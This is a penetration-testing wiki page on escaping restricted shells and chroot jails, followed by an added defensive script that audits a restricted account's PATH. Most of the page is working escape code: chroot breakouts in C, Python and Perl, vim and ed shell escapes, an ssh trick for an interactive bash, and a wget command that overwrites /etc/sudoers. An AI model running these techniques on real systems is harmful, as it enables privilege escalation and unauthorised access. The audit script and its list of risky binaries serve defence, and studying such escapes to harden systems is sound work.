Escaping from restricted shells - Jails

GTFOBins

Search https://gtfobins.github.io/ to check whether any binary you can execute has the “Shell” property.

Chroot limitation

From Wikipedia: The chroot mechanism is not intended to defend against intentional tampering by privileged (root) users. On most systems, chroot contexts do not stack properly and chrooted programs with sufficient privileges may perform a second chroot to break out.

Therefore, if you are root inside a chroot, you can escape by creating another chroot. However, in several cases you won’t be able to execute the chroot command inside the first chroot, so you will need to compile a binary like the following one and run it:

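{% code title="break_chroot.c" %}

#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>

//gcc break_chroot.c -o break_chroot

int main(void)
{
    // Directory used as the target of the second chroot
    mkdir("chroot-dir", 0755);
    // chroot() moves the root but not the current working directory,
    // so the working directory now lies outside the new root
    chroot("chroot-dir");
    // Walk up until the real filesystem root is reached
    for(int i = 0; i < 1000; i++) {
        chdir("..");
    }
    // Make the real root the root of this process
    chroot(".");
    system("/bin/bash");
}

{% endcode %}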

Using python:

#!/usr/bin/python
import os
os.mkdir("chroot-dir")
os.chroot("chroot-dir")
for i in range(1000):
    os.chdir("..")
os.chroot(".")
os.system("/bin/bash")

Using perl:

#!/usr/bin/perl
mkdir "chroot-dir";
chroot "chroot-dir";
foreach my $i (0..1000) {
    chdir ".."
}
chroot ".";
system("/bin/bash");

Modify PATH

Check if you can modify the PATH env variable

echo $PATH #See the path of the executables that you can use
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path
echo /home/* #List directory

Using vim

:set shell=/bin/sh
:shell

Create script

Check if you can create an executable file with /bin/bash as content

red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path

Get bash from SSH

If you are accessing via ssh you can use this trick to execute a bash shell:

ssh -t user@<IP> bash # Get directly an interactive shell

Wget

With wget you can overwrite files, for example the sudoers file:

wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
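
To check a restricted account's environment for the exposures described in the sections above, here is an added example (not part of the original page): a POSIX shell function that walks the PATH given to the account and reports writable directories and reachable binaries named on this page. The function name `audit_restricted_path` and the `RISKY_BINS` list are assumptions made for illustration.

```shell
#!/bin/sh
# Binaries this page uses to get a shell or overwrite files (assumed list,
# built from the page's sections; extend it from GTFOBins as needed).
RISKY_BINS="vim ed red wget python perl bash sh ssh"

# audit_restricted_path PATH_VALUE  (hypothetical helper name)
# Prints one finding per line for the PATH a restricted account is given:
#   MISSING <dir>    entry does not exist
#   WRITABLE <dir>   the caller can create files there ("Create script")
#   RISKY <file>     an executable named in RISKY_BINS is reachable
# Run it as the restricted account so -w reflects that account's rights.
audit_restricted_path() (
    set -f              # no globbing while PATH is split
    IFS=:
    set -- $1           # one positional parameter per PATH entry
    IFS=' '
    for dir in "$@"; do
        if [ -z "$dir" ]; then dir=.; fi    # empty entry means current dir
        if [ ! -d "$dir" ]; then
            echo "MISSING $dir"
            continue
        fi
        if [ -w "$dir" ]; then echo "WRITABLE $dir"; fi
        for bin in $RISKY_BINS; do
            if [ -f "$dir/$bin" ] && [ -x "$dir/$bin" ]; then
                echo "RISKY $dir/$bin"
            fi
        done
    done
)

# Usage: sh audit_path.sh "/usr/local/rbin:/opt/tools"
if [ "$#" -gt 0 ]; then
    audit_restricted_path "$1"
fi
```

A restricted account's PATH should produce no WRITABLE or RISKY lines; each one corresponds to a technique listed on this page.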

Other tricks

https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
https://pen-testing.sans.org/blog/2012/0b6/06/escaping-restricted-linux-shells
https://gtfobins.github.io

The following page may also be of interest:

{% page-ref page="../useful-linux-commands/bypass-bash-restrictions.md" %}